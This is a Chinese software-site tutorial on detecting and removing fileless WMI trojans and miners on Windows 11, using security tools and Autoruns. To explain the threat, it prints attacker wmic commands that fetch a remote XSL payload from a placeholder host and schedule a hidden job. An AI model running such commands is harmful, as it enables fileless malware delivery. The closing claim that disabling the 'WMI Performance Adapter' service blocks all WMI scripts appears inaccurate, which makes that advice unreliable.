浏览器
双核浏览器
游戏浏览器
高速浏览器
视频浏览器
IE浏览器
浏览器周边
手机浏览器
安卓游戏
音乐舞蹈
养成游戏
儿童游戏
仙侠手游
角色扮演
策略塔防
休闲益智
动作冒险
飞行射击
模拟经营
体育运动
赛车竞速
网络游戏
安卓软件
资讯阅读
生活服务
影音播放
购物理财
效率办公
趣味娱乐
交通出行
学习教育
摄影图像
在线音乐
系统工具
网络购物
聊天工具
安全杀毒
图片编辑
新闻资讯
软件资讯
游戏资讯
手机教程
手游攻略
游戏攻略
软件教程
IE专区
安卓专题
文章合集
电脑软件专题
安全软件
杀毒软件
系统安全
加密解密
防火墙
远程控制
木马查杀
影音软件
网络电视
视频播放
音乐播放
视频制作
音频编辑
录音录像
教育学习
外语学习
教育管理
早教启蒙
在线课堂
成人教育
资格考试
聊天社交
即时通讯
视频聊天
在线交友
变声器
表情包
办公软件
线上会议
文档管理
行业管理
考勤打卡
应用工具
输入法
下载工具
时钟日历
记事本
文件管理
计算器
编程开发
编程工具
JAVA相关
加壳脱壳
编程控件
数据库
网页源码
软件开发
补丁制作
系统美化
桌面制作
壁纸大全
系统主题
屏幕保护
桌面辅助
系统软件
系统优化
备份还原
系统检测
U盘工具
磁盘工具
驱动补丁
图文处理
图片素材
图像处理
图片制作
图片压缩
电子相册
抓图工具
其他软件
电子书籍
模拟器
辅助工具
交通出行
手机管理
其他工具
素材下载
字体素材
PPT素材
专区
文章合集
软件
游戏
浏览器
安卓专题
软件
游戏
浏览器
IEfans/ 新闻资讯/ 软件教程 /怎么彻查Win11的WMI木马

怎么彻查Win11的WMI木马

2022-11-09 15:54:14 编辑:匿名

WMI是一个windows11系统中非常核心的功能,我们可以通过运用这个功能来实现脚本部署、进程枚举、监控目录修改等常见的操作,但是总有一些不怀好意的人对此进行木马病毒的植入,一旦WMI被植入木马病毒,由于其特殊性,会对我们的系统造成非常严重的损伤,那么该如何解决这个问题呢?感兴趣的小伙伴们可以往下看看。

image.png

Win11 WMI木马查杀方法分享

1. 了解WMI恶意软件的运行机制

如上所述,WMI具备的功能非常丰富,对于黑客来说只要利用其中的命令就可以完成很多操作。比如获得相应的权限后,在目标电脑上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以实现从网站服务器上下载所需的恶意软件123.xsl(图1)。

当然在实际运行中,这些恶意软件还可以利用WMI进行更多的操作,如使用“wmic job call create "123.exe",0,0,true,false,********154800.000000+480”命令创建一个在后台运行的任务计划,甚至可以执行创建系统服务、将DLL文件注入系统进程等操作。因为这里使用的都是系统命令(wmic.exe),并不像常规的木马、病毒那样由本体执行,所以称之为“无文件”(严格来说是WMI脚本运行,脚本被触发后执行下载木马等操作)方式运行。比如臭名昭著的“KingMiner挖矿木马”,它通过WMI事件订阅来不断地触发木马在后台运行。

●火速链接:

本刊2018年6期文章《解决WMI进程资源占用的问题》介绍了WMI的相关知识。

2. 发现和识别WMI恶意软件

WMI木马的一个重要特性就是借助WMI脚本来下载或者激活木马运行。比如某WMI挖矿木马感染电脑后会在系统里生成一个任务计划,任务会在后台连接到服务器下载挖矿木马。挖矿木马运行后会占用系统大量的资源和带宽,导致Windows在日常使用时运行缓慢,网页打开速度也变得很慢,且电脑的硬盘指示灯一直在闪烁(因为木马会在后台不断地读取数据)。如果自己的电脑在使用时有上述的异常现象,那么就需要使用安全软件检查是否中了木马。

Windows 10用户可以先使用系统自带的“安全中心”进行查杀,如果无法解决问题则可以借助一些木马专杀软件,如火绒恶性木马专杀工具(https://bbs.huorong.cn/thread-18575-1-1.html)进行查杀,启动软件后点击“立即扫描”,常见的木马(包括WMI木马)一般都可以被自动查杀(图2)。

不过,如果中了WMI木马,安全软件只会将WMI脚本下载的木马文件删除,但是无法完全斩断WMI木马文件的下载途径,如上述介绍的WMI挖矿木马就是利用任务计划进行下载。因为任务计划中并没有恶意软件,安全软件是不会将其删除的,所以通过专杀软件删除木马后,每次重启系统扫描后还是一直提示发现木马文件,那么就极可能中了WMI木马,这时就还需要对系统的启动项进行检查,查看是否有异常的启动项。

系统启动项检查可以借助Autoruns来完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),启动程序后它会自动对本机所有的启动项目进行检测,包括计划任务、服务、WMI等(图3)。

比如笔者公司的一台电脑在执行安全扫描时就发现木马文件无法彻底删除的现象,在本机运行Autoruns后切换到“计划任务”,在打开的窗口中就可以看到后台所有的任务计划。对于没有数字签名的任务,程序会使用浅红色进行标注,可以看到本机中一个名为“lsmosee”的任务极为可疑,它加载的是本机临时目录中的一个VBS文件(图4)。

在上图选中“lsmosee”并右击,选择“跳转到文件夹”,在打开的文件夹中根据图上“镜像路径”的提示,使用记事本打开“54236.vbs”文件,其中显示的正是一些WMI脚本的内容,它的作用就是在后台定时下载木马文件。现在按提示将其删除。接着返回上图,选中“lsmosee”任务并点击“删除”,这样就可以切断木马的下载通道。最后使用火绒安全软件再扫描一遍电脑,删除其他带毒的文件后,问题得到顺利的解决(图5)。

3. 一劳永逸封禁WMI木马下载

WMI木马难以查杀的原因就是由于它的下载方式是通过WMI脚本实现,而且WMI脚本激活的方法很多(如上例为任务计划,有些则是使用进程注入等),不过WMI脚本的运行要依赖“WMI Performance Adapter”服务,因此对于个人用户来说,可以通过停用服务的方法来禁止WMI脚本的运行。在桌面的任务栏搜索框中输入“服务”,打开服务管理组件后找到上述服务,双击打开后将其停止,并将其启动类型设置为“禁用”,这样本机所有的WMI脚本就无法运行了(图6)。

注意:

禁用WMI服务可能会导致一些网络服务无法使用。禁用服务如果影响电脑使用,请及时进行恢复

上文就是小编为您带来的Win11 WMI木马查杀方法了,若还有疑问请多多关注Iefans手机教程频道

相关推荐

相关专题

电脑实用软件 电脑实用软件

所谓术业有专攻,同一件工具在不同的人手里所能发挥的效用是会有很大的差异的,检验一款电脑软件是否实用的标准就是它能否解决你的问题、你用着是否顺手,快来看看小编带来的专题中有哪一款能够同时满足这两个条件吧。

系统工具软件 系统工具软件

电脑用久了难免会出现大大小小的问题,常备小编推荐的这些系统工具软件,无论是运行卡慢,还是安装驱动、清理残余垃圾,都可以让你轻松达到目的,它们全部支持免费使用。

软件更新